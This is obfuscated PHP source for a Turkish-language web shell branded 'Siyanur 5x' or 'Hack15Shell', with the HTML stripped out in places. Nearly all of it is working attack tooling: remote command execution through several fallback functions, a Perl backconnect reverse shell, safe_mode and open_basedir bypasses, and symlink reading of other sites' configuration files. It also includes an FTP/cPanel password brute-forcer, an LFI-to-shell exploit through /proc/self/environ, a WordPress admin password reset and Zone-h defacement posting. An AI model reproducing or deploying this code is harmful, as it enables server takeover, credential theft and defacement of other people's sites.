'; $pg = basename('index.php'); echo 'OS : '; $safe_mode = @ini_get('safe_mode'); $dir = @getcwd(); $IIIIIIIIIl11=$_SERVER['REMOTE_ADDR']; $IIIIIIIII1II=$_SERVER['SERVER_ADDR']; define('SWS','al-swisre'); if ($IIIIIIIII1I1) { } else { $IIIIIIIII1I1 = @php_uname(); echo $IIIIIIIII1I1 ; } echo (($safe_mode)?('safe_mode  : ON'):('
Safe_mode: OFF')); echo '
Disable_functions : '; if(''==($IIIIIIIII1lI=@ini_get('disable_functions'))){echo 'NONE
';}else{ echo "$IIIIIIIII1lI"; } echo '
Server : '.$_SERVER['SERVER_SOFTWARE'].'
'; echo 'PHP version : '.@phpversion().'
'; echo 'Id : '.'user = '.@get_current_user().' | uid= '.@getmyuid().' | gid= '.@getmygid().'
'; echo "Your ip : $IIIIIIIIIl11    | ip server : $IIIIIIIII1II
"; ;echo '
'; error_reporting(E_ERROR |E_WARNING |E_PARSE); $fedit=$_GET['fedit']; if ($fedit <>''){ $fedit=realpath($fedit); $IIIIIIIIlIIl = file($fedit); echo "
"; echo "
"; $savefile=$_POST['savefile']; $filepath=realpath($_POST['filepath']); if ($savefile <>'') { $IIIIIIIIII11=fopen("$filepath",'w+'); fwrite ($IIIIIIIIII11,'') ; fwrite ($IIIIIIIIII11,$savefile) ; fclose($IIIIIIIIII11); echo ""; } exit(); } ;echo ' '; $fchmod=$_GET['fchmod']; if ($fchmod <>''){ $fchmod=realpath($fchmod); echo "

chmod for :$fchmod

Chmod :

"; $chmod0=$_POST['chmod0']; if ($chmod0 <>''){ chmod ($fchmod ,$chmod0); }else { echo 'primission Not Allow change Chmod'; } exit(); } ;echo 'Dosya y.net - SymLink bypass - Manuel SymLink - Cpanel FTP Cracker - PHP Eval - Lolipop modu - PHP4'e d...r - CGI Telnet
PHP Func() Bypass - Mod_security bypass - Safe_mode bypass - Path bypass - Joomla token ara - Reverse ip - Pagerank sorgula
Script bulucu - Named Bypass - Dosya Upload - Komut .al..t.r - Wp .ifre de.i.tir - Backconnect -

'; $id=$_GET['id']; if ($id=='hakkimda') { echo " Siyanur bypass shell son versiyonudur Siyanur 5x olarak adland.r.l.r
En geli.mi. versiyonudur bir.ok php shell'in ta..mad... .zelli.i ta..r

"; echo "OS :".php_uname(); echo '
IP :'. ($_SERVER['REMOTE_ADDR']); echo '
'; } if( $id == 'downloadit'){ $IIIIIIIIlll1 = getcwd(); cmd("tar --create --recursion --file=backup.tar $IIIIIIIIlll1"); $IIIIIIIIll1I=explode('/','backup.tar'); for($IIIIIIIIll11=0;$IIIIIIIIll11 Back Connecting

Netcat a. bu komutu uygula: nc -l -p 1542




Then input your IP and Port

:



'; $pip=$_POST['pip'];$pport=$_POST['pport']; if ($pip <>'') { $IIIIIIIIII11=fopen($_POST['ppath'].DS.rand(0,10).'bc_perl_enhack.pl','w'); if (!$IIIIIIIIII11){ $IIIIIIIIl111 = 'Error: couldn't write file to open socket connection'; }else { @fputs($IIIIIIIIII11,base64_decode($IIIIIIIIl1ll)); fclose($IIIIIIIIII11); $IIIIIIIIl111 = IIIIIIl1ll11('perl '.$_POST['ppath'].'/bc_perl_enhack.pl '.$pip.' '.$pport.' &'); } } } if( $id == 'rootexploit'){ if(!isset($_GET['rootexploit'])) { ;echo '
Select Website


'; } else { $IIIIIIII1IlI = php_uname(r); $IIIIIIII1Ill = php_uname(s); if(eregi('Linux',$IIIIIIII1Ill)) { $IIIIIIII1IlI=substr($IIIIIIII1IlI,0,6); if($_GET['rootexploit'] == 'exploit-db') { header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Linux+Kernel+$IIIIIIII1IlI"); } else if($_GET['rootexploit'] == 'packetstormsecurity') { header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+$IIIIIIII1IlI"); } else if($_GET['rootexploit'] == 'exploitsearch') { header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$IIIIIIII1IlI"); } else if($_GET['rootexploit'] == 'shodanhq') { header("Location:http://www.shodanhq.com/exploits?q=Linux+Kernel+$IIIIIIII1IlI"); } } else { $IIIIIIII1IlI=substr($IIIIIIII1IlI,0,3); if($_GET['rootexploit'] == 'exploit-db') { header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$IIIIIIII1Ill+Lversion"); } else if($_GET['rootexploit'] == 'packetstormsecurity') { header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=$IIIIIIII1Ill+Lversion"); } else if($_GET['rootexploit'] == 'exploitsearch') { header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$IIIIIIII1Ill+Lversion"); } else if($_GET['rootexploit'] == 'shodanhq') { header("Location:http://www.shodanhq.com/exploits?q=$IIIIIIII1Ill+Lversion"); } } } } if( $id == 'pass'){ error_reporting(0); set_magic_quotes_runtime(0); if(version_compare(phpversion(),'4.1.0') == -1) {$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; }function IIIIIIII1I11($IIIIIIII1lII,$IIIIIIII1lIl){$IIIIIIII1lI1=$_SERVER['REQUEST_URI']; if (strstr ($IIIIIIII1lI1,$IIIIIIII1lII)){return preg_replace("/$IIIIIIII1lII=[\d\w\W\D\S]*/","$IIIIIIII1lII=$IIIIIIII1lIl",$IIIIIIII1lI1);}elseif (strstr ($IIIIIIII1lI1,'showsc')){return preg_replace("/showsc=[\d\w\W\D\S]*/","$IIIIIIII1lII=$IIIIIIII1lIl",$IIIIIIII1lI1);} elseif (strstr ($IIIIIIII1lI1,'hlp')){return preg_replace("/hlp=[\d\w\W\D\S]*/","$IIIIIIII1lII=$IIIIIIII1lIl",$IIIIIIII1lI1);}elseif (strstr($IIIIIIII1lI1,'?')){return $IIIIIIII1lI1.'&'.$IIIIIIII1lII.'='.$IIIIIIII1lIl;} else{return $IIIIIIII1lI1.'?'.$IIIIIIII1lII.'='.$IIIIIIII1lIl;}} function IIIIIIII1ll1($IIIIIIII1l1I){print"
";print"
$IIIIIIII1l1I
";} function IIIIIIII1l1l($IIIIIIII1l11){if (function_exists(shell_exec)){$IIIIIIII11II=shell_exec($IIIIIIII1l11); $IIIIIIII11I1=htmlspecialchars($IIIIIIII11II);print $IIIIIIII11I1;} elseif(!function_exists(shell_exec)){exec($IIIIIIII1l11,$IIIIIIII11ll); $IIIIIIII11ll = join(" ",$IIIIIIII11ll);$IIIIIIII111I=htmlspecialchars($IIIIIIII11ll);print $IIIIIIII111I;} elseif(!function_exists(exec)){$IIIIIIII111l = popen($IIIIIIII1l11,'r'); while (!feof($IIIIIIII111l)){$IIIIIIIlIIIl = htmlspecialchars(fgetc($IIIIIIII111l));; print $IIIIIIIlIIIl;}pclose($IIIIIIII111l);}elseif(!function_exists(popen)){ ob_start();system($IIIIIIII1l11);$IIIIIIIlII1I = ob_get_contents();ob_clean();print htmlspecialchars($IIIIIIIlII1I);}elseif(!function_exists(system)){ ob_start();passthru($IIIIIIII1l11);$IIIIIIIlIlII = ob_get_contents();ob_clean(); print htmlspecialchars($IIIIIIIlIlII);}} function IIIIIIIlIlIl($IIIIIIIlIlI1,$name,$IIIIIIIlIllI,$IIIIIIIlIlll) {if (empty($IIIIIIIlIllI)){print "";} elseif(empty($name)&&empty($IIIIIIIlIlll)){print "";} elseif(empty($IIIIIIIlIlll)){print "";} else {print "";}} function IIIIIIIlIll1($IIIIIIIlIl1I){if (is_writable($IIIIIIIlIl1I)){print ''; callperms($IIIIIIIlIl1I);print '';} elseif (!is_readable($IIIIIIIlIl1I)&&!is_writable($IIIIIIIlIl1I)){print ''; callperms($IIIIIIIlIl1I);print '';} else {print '';callperms($IIIIIIIlIl1I);}} if ($IIIIIIIlI1II=='dwld'){IIIIIIIlI1Il($_REQUEST['dwld']);} function IIIIIIIlI1Il($IIIIIIIlI1I1) {$IIIIIIIlIlll = filesize($IIIIIIIlI1I1); @header("Content-Type: application/force-download;name=$IIIIIIIlI1I1"); @header('Content-Transfer-Encoding: binary'); @header("Content-Length: $IIIIIIIlIlll"); @header("Content-Disposition: attachment; filename=$IIIIIIIlI1I1"); @header('Expires: 0'); @header('Cache-Control: no-cache, must-revalidate'); @header('Pragma: no-cache'); @readfile($IIIIIIIlI1I1);exit;} ;echo ' Hack15Shell '; $IIIIIIIlI1lI =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$IIIIIIIlI1lI=getcwd(); $IIIIIIIlI1l1='
';$IIIIIIIlI11I='
'; $IIIIIIIlI11l=""; $IIIIIIIlI111='
';$IIIIIIIllIII=""; $IIIIIIIllIIl="";$IIIIIIIllII1=''; $IIIIIIIllIlI=''; $IIIIIIIllIl1='';$IIIIIIIllI1I=''; $IIIIIIIllI1l = 'no'; $IIIIIIIllI11 = 'localhost'; $IIIIIIIlllII = 'root'; $IIIIIIIlllIl = 'pass'; $IIIIIIIlllI1 = 'name'; $IIIIIIIllllI = 'xxx'; $IIIIIIIlllll = 'xx'; $IIIIIIIllll1 = 'hack15.txt'; $IIIIIIIlll1I = 'hack15.txt'; print"";print'
';print'
'; print "php fonksiyonlar. ile Bypass"; print '
'; echo '
'; print ""; if (@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on') { $IIIIIIIlll11 = true; $IIIIIIIll1II = "ON (secure)"; } else {$IIIIIIIlll11 = false;$IIIIIIIll1II = "OFF (not secure)";} if ($IIIIIIIll1Il=='greet') { echo "'; } if(empty($_POST['sorce'])){ }else { } if(empty($_POST['func'])){ }else { echo "

'; } if(empty($_POST['sym'])){ }else { echo "'; } } if(empty($_POST['plugin'])){ }else { echo "'; } if ($_POST['rid'] ){ echo "'; break; } $IIIIIIIl1Il1 = !empty($_POST['rimap']) ?$_POST['rimap'] : 0; if(empty($_POST['rimap'])){ }else { echo "'; } if(empty($_POST['curl'])){ }else { echo "'; } if(empty($_POST['ssql'])){ }else { echo "'; } if (isset ($_REQUEST['safefile'])){ $file=$_REQUEST['safefile'];$IIIIIII1IIIl='';if(empty($file)){ if(empty($_GET['file'])){if(empty($_POST['file'])){ print '
[ Please choose a file first to read it using copy() ]
'; }else {$file=$_POST['file'];}}else {$file=$_GET['file'];}} $IIIIIII1III1=tempnam($IIIIIII1IIIl,'cx');if(copy('compress.zlib://'.$file,$IIIIIII1III1)){ $IIIIIII1IIl1 = fopen($IIIIIII1III1,'r');$IIIIIII1II1I = fread($IIIIIII1IIl1,filesize($IIIIIII1III1)); fclose($IIIIIII1IIl1);echo '
'.$IIIIIIIllIlI.htmlspecialchars($IIIIIII1II1I).$IIIIIIIllIll.'
';unlink($IIIIIII1III1);}else { print "
Sorry, Can't read the selected file !!

";}}if (isset ($_REQUEST['inifile'])){ ini_restore('safe_mode');ini_restore('open_basedir'); print '
'.$IIIIIIIllIlI;
if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $IIIIIIIllIll.'
';} print "
"; print '
'; print $IIIIIIIlI11l.$IIIIIIIllIII.'
Using copy() function
'; print $IIIIIIIllII1.$IIIIIIIllIIl.$IIIIIIIlI1l1.' '; IIIIIIIlIlIl('text','safefile',$IIIIIIIlI1lI,75); IIIIIIIlIlIl('hidden','scdir',$IIIIIIIlI1lI,0);print ' '; IIIIIIIlIlIl('submit','','G.ster','');print ''.$IIIIIIIllII1.$IIIIIIIlI11I.$IIIIIIIlI111; print '
'; print $IIIIIIIlI11l.$IIIIIIIllIII.'
Using ini_restore() function
'; print $IIIIIIIllII1.$IIIIIIIllIIl.$IIIIIIIlI1l1.' '; IIIIIIIlIlIl('text','inifile',$IIIIIIIlI1lI,75); IIIIIIIlIlIl('hidden','scdir',$IIIIIIIlI1lI,0);print ' '; IIIIIIIlIlIl('submit','','G.ster','');print ''.$IIIIIIIllII1.$IIIIIIIlI11I.$IIIIIIIlI111; print '
'; print ""; print '
'; print $IIIIIIIlI11l.$IIIIIIIllIII.'
Using sql() function
'; print $IIIIIIIllII1.$IIIIIIIllIIl.$IIIIIIIlI1l1.' '; IIIIIIIlIlIl('text','ssql',$IIIIIIIlI1lI,75); IIIIIIIlIlIl('hidden','scdir',$IIIIIIIlI1lI,0);print ' '; IIIIIIIlIlIl('submit','','G.ster','');print ''.$IIIIIIIllII1.$IIIIIIIlI11I.$IIIIIIIlI111; print '
'; print $IIIIIIIlI11l.$IIIIIIIllIII.'
Using Curl() function
'; print $IIIIIIIllII1.$IIIIIIIllIIl.$IIIIIIIlI1l1.' '; IIIIIIIlIlIl('text','curl',$IIIIIIIlI1lI,75); IIIIIIIlIlIl('hidden','scdir',$IIIIIIIlI1lI,0);print ' '; IIIIIIIlIlIl('submit','','G.ster','');print ''.$IIIIIIIllII1.$IIIIIIIlI11I.$IIIIIIIlI111; print '
'; print ""; print '
'; print $IIIIIIIlI11l.$IIIIIIIllIII.'
Using imap() function
'; print $IIIIIIIllII1.$IIIIIIIllIIl.$IIIIIIIlI1l1.' '; IIIIIIIlIlIl('text','rimap',$IIIIIIIlI1lI,75); IIIIIIIlIlIl('hidden','scdir',$IIIIIIIlI1lI,0);print ' '; IIIIIIIlIlIl('submit','','G.ster','');print ''.$IIIIIIIllII1.$IIIIIIIlI11I.$IIIIIIIlI111; print '
'; print $IIIIIIIlI11l.$IIIIIIIllIII.'
Using id() function
'; print $IIIIIIIllII1.$IIIIIIIllIIl.$IIIIIIIlI1l1.' '; IIIIIIIlIlIl('text','rid',$IIIIIIIlI1lI,75); IIIIIIIlIlIl('hidden','scdir',$IIIIIIIlI1lI,0);print ' '; IIIIIIIlIlIl('submit','','G.ster','');print ''.$IIIIIIIllII1.$IIIIIIIlI11I.$IIIIIIIlI111; print '
'; print ""; print '
'; print $IIIIIIIlI11l.$IIIIIIIllIII.'
Using plugin() function
'; print $IIIIIIIllII1.$IIIIIIIllIIl.$IIIIIIIlI1l1.' '; IIIIIIIlIlIl('text','plugin',$IIIIIIIlI1lI,75); IIIIIIIlIlIl('hidden','scdir',$IIIIIIIlI1lI,0);print ' '; IIIIIIIlIlIl('submit','','G.ster','');print ''.$IIIIIIIllII1.$IIIIIIIlI11I.$IIIIIIIlI111; print '
'; print $IIIIIIIlI11l.$IIIIIIIllIII.'
Using symlink() function
'; print $IIIIIIIllII1.$IIIIIIIllIIl.$IIIIIIIlI1l1.' '; IIIIIIIlIlIl('text','sym',$IIIIIIIlI1lI,75); IIIIIIIlIlIl('hidden','scdir',$IIIIIIIlI1lI,0);print ' '; IIIIIIIlIlIl('submit','','G.ster','');print ''.$IIIIIIIllII1.$IIIIIIIlI11I.$IIIIIIIlI111; print '
'; print ""; print '
'; print $IIIIIIIlI11l.$IIIIIIIllIII.'
Connect To Functions Of Config
'; print $IIIIIIIllII1.$IIIIIIIllIIl.$IIIIIIIlI1l1.' '; IIIIIIIlIlIl('text','func',$IIIIIIIlI1lI,75); IIIIIIIlIlIl('hidden','scdir',$IIIIIIIlI1lI,0);print ' '; IIIIIIIlIlIl('submit','','G.ster','');print ''.$IIIIIIIllII1.$IIIIIIIlI11I.$IIIIIIIlI111; print '
'; ;echo ''; } if( $id == 'ZoneH'){ echo '
Zone-h Poster
'; $IIIIIIIll11l = curl_init(); curl_setopt($IIIIIIIll11l,CURLOPT_URL,$IIIIIII1IlIl); curl_setopt($IIIIIIIll11l,CURLOPT_POST,true); curl_setopt($IIIIIIIll11l,CURLOPT_POSTFIELDS,'defacer='.$IIIIIII1IlI1.'&domain1='.$site.'&hackmode='.$IIIIIII1Illl.'&reason='.$IIIIIII1Ill1); curl_setopt($IIIIIIIll11l,CURLOPT_FOLLOWLOCATION,true); curl_setopt($IIIIIIIll11l,CURLOPT_RETURNTRANSFER,true); $IIIIIII1Il1I = curl_exec($IIIIIIIll11l); curl_close($IIIIIIIll11l); return $IIIIIII1Il1I; } if( $id == 'crack'){ @ini_set('memory_limit',1000000000000); $IIIIIII1I1II=5; @set_time_limit(0); $submit = $_REQUEST['submit']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $option = $_REQUEST['option']; $page = $_GET['page']; if($target == ''){ $target = 'localhost'; } @ini_set('memory_limit',1000000000000); $IIIIIII1I1II=5; @set_time_limit(0); $submit = $_REQUEST['submit']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $option = $_REQUEST['option']; if($target == ''){ $target = 'localhost'; } print "


Host :


Kullan.c. adlar.

.ifre listesi


Options : cPanel ftp

"; function IIIIIII1I111($host,$user,$pass,$IIIIIII1lII1){ $IIIIIIIl1lI1 = curl_init(); curl_setopt($IIIIIIIl1lI1,CURLOPT_URL,"ftp://$host"); curl_setopt($IIIIIIIl1lI1,CURLOPT_RETURNTRANSFER,1); curl_setopt($IIIIIIIl1lI1,CURLOPT_HTTPAUTH,CURLAUTH_BASIC); curl_setopt($IIIIIIIl1lI1,CURLOPT_FTPLISTONLY,1); curl_setopt($IIIIIIIl1lI1,CURLOPT_USERPWD,"$user:$pass"); curl_setopt ($IIIIIIIl1lI1,CURLOPT_CONNECTTIMEOUT,$IIIIIII1lII1); curl_setopt($IIIIIIIl1lI1,CURLOPT_FAILONERROR,1); $IIIIIII1lIlI = curl_exec($IIIIIIIl1lI1); if ( curl_errno($IIIIIIIl1lI1) == 28 ) { print ' Hata : S.re d... kald.n , tekrar dene !'; exit;} elseif ( curl_errno($IIIIIIIl1lI1) == 0 ){ print "[ user@aria-security.com ]# Sald.r. ba.ar.l. , bulunan kullan.c. ad. , $user ve .ifre , $pass
";}curl_close($IIIIIIIl1lI1);} function IIIIIII1lIl1($host,$user,$pass,$IIIIIII1lII1){ $IIIIIIIl1lI1 = curl_init(); curl_setopt($IIIIIIIl1lI1,CURLOPT_URL,"http://$host:2082"); curl_setopt($IIIIIIIl1lI1,CURLOPT_RETURNTRANSFER,1); curl_setopt($IIIIIIIl1lI1,CURLOPT_HTTPAUTH,CURLAUTH_BASIC); curl_setopt($IIIIIIIl1lI1,CURLOPT_USERPWD,"$user:$pass"); curl_setopt ($IIIIIIIl1lI1,CURLOPT_CONNECTTIMEOUT,$IIIIIII1lII1); curl_setopt($IIIIIIIl1lI1,CURLOPT_FAILONERROR,1); $IIIIIII1lIlI = curl_exec($IIIIIIIl1lI1); if ( curl_errno($IIIIIIIl1lI1) == 28 ) { print ' Error : Connection timed out , make confidence about validation of target !'; exit;} elseif ( curl_errno($IIIIIIIl1lI1) == 0 ){ print " Sald.r. ba.ar.l. , bulunan kullan.c. ad. , $user ve .ifre , $pass
";}curl_close($IIIIIIIl1lI1);} if(isset($submit) &&!empty($submit)){ $IIIIIII1lI1I = explode (" ",$users ); $IIIIIII1lI1l = explode (" ",$pass ); print ' Sald.r. ba.lad. ...

'; foreach ($IIIIIII1lI1I as $user) { $IIIIIII1lI11 = trim($user); foreach ($IIIIIII1lI1l as $password ) { $IIIIIII1llI1 = trim($password); if($option == 'ftp'){ IIIIIII1I111($target,$IIIIIII1lI11,$IIIIIII1llI1,$IIIIIII1I1II); } if ($option == 'cpanel') { IIIIIII1lIl1($target,$IIIIIII1lI11,$IIIIIII1llI1,$IIIIIII1I1II); } } } } } if ($id=='anasayfa') { echo 'xx'; } if ($id=='ddos') { echo 'ddos b.l.m. yap.m a.amas.nda'; } if ($id=='manuelsym') { echo ' Manuel Symlink b.l.m.







'; $IIIIIII1lllI = $_POST['file']; $symfile = $_POST['symfile']; $symlink = $_POST['symlink']; if ($symlink) { @symlink("$IIIIIII1lllI","sym/$symfile"); echo '
'.$symfile.''; exit; } } if ($id=='symlink') { $IIIIIII1ll1I = @mkdir('sym',0777); $IIIIIII1ll1l = "Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any"; $IIIIIII1ll11 =@fopen ('sym/.htaccess','w'); @fwrite($IIIIIII1ll11 ,$IIIIIII1ll1l); $sym = @symlink('/','sym/root'); $pg = basename('index.php'); $IIIIIII1l1II = @file('/etc/named.conf'); if(!$IIIIIII1l1II) { die ('

named.conf Dosyas. okunam.yor Manuel symlink deneyiniz
'); } else { echo "
"; foreach($IIIIIII1l1II as $IIIIIII1l1Il){ if(eregi('zone',$IIIIIII1l1Il)){ preg_match_all('#zone "(.*)"#',$IIIIIII1l1Il,$IIIIIII1l1lI); flush(); if(strlen(trim($IIIIIII1l1lI[1][0])) >2){ $user = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIII1l1lI[1][0])); $site = $user['name'] ; @symlink('/','sym/root'); $site = $IIIIIII1l1lI[1][0]; $ir = 'ir'; $il = 'il'; if (preg_match("/.^$ir/",$IIIIIII1l1lI[1][0]) or preg_match("/.^$il/",$IIIIIII1l1lI[1][0]) ) { $site = "
".$IIIIIII1l1lI[1][0].'
'; } echo " "; flush(); } } } } } else { $IIIIIII1lllI = $_POST['file']; $symfile = $_POST['symfile']; $symlink = $_POST['symlink']; if ($symlink) { @symlink("$IIIIIII1lllI","sym/$symfile"); echo '
'.$symfile.''; exit; } } if ($id=='phpeval') { $code=stripslashes($_POST['code']); echo '

Eval php komut sistemi






'; } if ($id=='lfiupload') { echo "
LFI URL: "; if($_POST['lfiurl']) { print '
';
$target = $_POST['lfiurl'];
$IIIIIII11II1 = '../../../../../../../../../../../../../../../etc/passwd%00';
$IIIIIII11IlI = '../../../../../../../../../../../../../../../proc/self/environ%00';
$IIIIIII11Ill = preg_split('/.php/',$target);
$IIIIIII11I1I = preg_split("/\//",$IIIIIII11Ill[0]);
$IIIIIIIlIl1I = '/';
$IIIIIII11I1l = count($IIIIIII11I1I) -1;
for($IIIIIII11lII = 3;$IIIIIII11lII<$IIIIIII11I1l;$IIIIIII11lII++) {
$IIIIIIIlIl1I.= $IIIIIII11I1I[$IIIIIII11lII].'/';
}
$IIIIIII11lIl = $IIIIIII11I1I[$IIIIIII11I1l].'.php'.$IIIIIII11Ill[1];
$host = $IIIIIII11I1I[2];
print '[+] Testing LFI ... ';
flush();
$IIIIIIIlIIIl = IIIIIII11l11($target.$IIIIIII11II1);
if(preg_match('/root:x:0:0/',$IIIIIIIlIIIl)) {
print "Ok
[+] Reading /proc/self/environ ... "; flush(); $IIIIIII11lI1 = IIIIIII11l11($target.$IIIIIII11IlI); if(preg_match('/DOCUMENT_ROOT=/',$IIIIIII11lI1)) { print "Ok
[+] Exploiting target ...
"; flush(); $cmd = ""; $IIIIIII11lll = fsockopen($host,80); $IIIIIII11l1I = 'GET '.$IIIIIIIlIl1I.$IIIIIII11lIl.$IIIIIII11IlI." HTTP/1.0 Host: ".$host." Accept: */* User-Agent: ".$cmd." "; fputs($IIIIIII11lll,$IIIIIII11l1I); fclose($IIIIIII11lll); flush(); $IIIIIII11l1l = IIIIIII11l11('http://'.$host.$IIIIIIIlIl1I.'Siyanur5x.php'); if(preg_match('/gblack Was Here/',$IIIIIII11l1l)) { print "[+] Exploit successful!
[+] Shell uploaded to http://".$host.$IIIIIIIlIl1I.'sh3ll.php'; }else { print "[!] Exploit failed!
"; } } else { print "Failed
"; } }else { print "Failed
"; } } function IIIIIII11l11($IIIIIII1IlIl) { $IIIIIIIl1lI1 = curl_init(); curl_setopt($IIIIIIIl1lI1,CURLOPT_USERAGENT,'Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)'); curl_setopt($IIIIIIIl1lI1,CURLOPT_FOLLOWLOCATION,1); curl_setopt($IIIIIIIl1lI1,CURLOPT_HEADER,1); curl_setopt($IIIIIIIl1lI1,CURLOPT_URL,$IIIIIII1IlIl); curl_setopt($IIIIIIIl1lI1,CURLOPT_RETURNTRANSFER,1); curl_setopt($IIIIIIIl1lI1,CURLOPT_TIMEOUT,30); $IIIIIII1lIlI = curl_exec($IIIIIIIl1lI1); if(!$IIIIIII1lIlI) { return false; } return $IIIIIII1lIlI; } } if ($id=='pg') { echo "
"; echo "
"; ob_start(); set_time_limit(0); function IIIIIII111II($IIIIIII111Il,$IIIIIII111I1,$IIIIIII111lI) { $IIIIIII111ll = 4294967296; $IIIIIII111l1 = strlen($IIIIIII111Il); for ($IIIIIIIIll11 = 0;$IIIIIIIIll11 <$IIIIIII111l1;$IIIIIIIIll11++) { $IIIIIII111I1 *= $IIIIIII111lI; if ($IIIIIII111I1 >= $IIIIIII111ll) { $IIIIIII111I1 = ($IIIIIII111I1 -$IIIIIII111ll * (int) ($IIIIIII111I1 / $IIIIIII111ll)); $IIIIIII111I1 = ($IIIIIII111I1 <-2147483648) ?($IIIIIII111I1 +$IIIIIII111ll) : $IIIIIII111I1; } $IIIIIII111I1 += ord($IIIIIII111Il{$IIIIIIIIll11}); } return $IIIIIII111I1; } function IIIIIII1111l($IIIIIII11111) { $IIIIIIlIIIII = IIIIIII111II($IIIIIII11111,0x1505,0x21); $IIIIIIlIIIIl = IIIIIII111II($IIIIIII11111,0,0x1003F); $IIIIIIlIIIII >>= 2; $IIIIIIlIIIII = (($IIIIIIlIIIII >>4) &0x3FFFFC0 ) |($IIIIIIlIIIII &0x3F); $IIIIIIlIIIII = (($IIIIIIlIIIII >>4) &0x3FFC00 ) |($IIIIIIlIIIII &0x3FF); $IIIIIIlIIIII = (($IIIIIIlIIIII >>4) &0x3C000 ) |($IIIIIIlIIIII &0x3FFF); $IIIIIIlIIII1 = (((($IIIIIIlIIIII &0x3C0) <<4) |($IIIIIIlIIIII &0x3C)) <<2 ) |($IIIIIIlIIIIl &0xF0F ); $IIIIIIlIIIlI = (((($IIIIIIlIIIII &0xFFFFC000) <<4) |($IIIIIIlIIIII &0x3C00)) <<0xA) |($IIIIIIlIIIIl &0xF0F0000 ); return ($IIIIIIlIIII1 |$IIIIIIlIIIlI); } function IIIIIIlIIIll($IIIIIIlIIIl1) { $IIIIIIlIII1I = 0; $IIIIIIlIII1l = 0; $IIIIIIlIII11 = sprintf('%u',$IIIIIIlIIIl1) ; $IIIIIII111l1 = strlen($IIIIIIlIII11); for ($IIIIIIIIll11 = $IIIIIII111l1 -1;$IIIIIIIIll11 >= 0;$IIIIIIIIll11 --) { $IIIIIIlIIlIl = $IIIIIIlIII11{$IIIIIIIIll11}; if (1 === ($IIIIIIlIII1l %2)) { $IIIIIIlIIlIl += $IIIIIIlIIlIl; $IIIIIIlIIlIl = (int)($IIIIIIlIIlIl / 10) +($IIIIIIlIIlIl %10); } $IIIIIIlIII1I += $IIIIIIlIIlIl; $IIIIIIlIII1l ++; } $IIIIIIlIII1I %= 10; if (0 !== $IIIIIIlIII1I) { $IIIIIIlIII1I = 10 -$IIIIIIlIII1I; if (1 === ($IIIIIIlIII1l %2) ) { if (1 === ($IIIIIIlIII1I %2)) { $IIIIIIlIII1I += 9; } $IIIIIIlIII1I >>= 1; } } return '7'.$IIIIIIlIII1I.$IIIIIIlIII11; } function IIIIIIlIIlI1($IIIIIII1IlIl) { $IIIIIIlIIllI='http://toolbarqueries.google.com/tbr?client=navclient-auto&hl=en&ch='.IIIIIIlIIIll(IIIIIII1111l($IIIIIII1IlIl)).'&features=Rank&q=info:'.$IIIIIII1IlIl.'&num=100&filter=0'; $IIIIIII1lIlI=IIIIIIlIIl1l($IIIIIIlIIllI); $IIIIIIlIIlll = strpos($IIIIIII1lIlI,'Rank_'); if($IIIIIIlIIlll === false){}else{ $IIIIIIlIIl1I = substr($IIIIIII1lIlI,$IIIIIIlIIlll +9); return $IIIIIIlIIl1I; } } function IIIIIIlIIl1l($IIIIIII1IlIl) { $IIIIIIIl1lI1 = curl_init(); curl_setopt($IIIIIIIl1lI1,CURLOPT_HEADER,0); curl_setopt($IIIIIIIl1lI1,CURLOPT_RETURNTRANSFER,1); curl_setopt($IIIIIIIl1lI1,CURLOPT_URL,$IIIIIII1IlIl); $IIIIIII1lIlI = curl_exec($IIIIIIIl1lI1); curl_close($IIIIIIIl1lI1); return $IIIIIII1lIlI; } if(!$_POST['site']==''){ $site = explode(" ",$_POST['site']); foreach($site as $IIIIIIlIIl11){ $IIIIIIlIIl11 = trim($IIIIIIlIIl11); $IIIIIIlII1II = IIIIIIlIIlI1($IIIIIIlIIl11); echo $IIIIIIlIIl11.' => '.$IIIIIIlII1II.'
'; ob_flush(); flush(); } } } if ($id=='wpreset') { if(empty($_POST['pwd'])){ echo " host : database :
username : password :

Set A New username 4 Login :
Set A New password 4 Login :
"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $IIIIIIlII11l = crypt($pwd); $IIIIIIlIlIII=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error()); $IIIIIIlIlIII=@mysql_query("UPDATE wp_users SET user_pass ='".$IIIIIIlII11l."' WHERE ID = 1") or die(mysql_error()); if($IIIIIIlIlIII){ echo 'Ba.ar.yla .ifre ve kullan.c. ad. g.ncelle '; } } } if ($id=='versiyon') { echo '

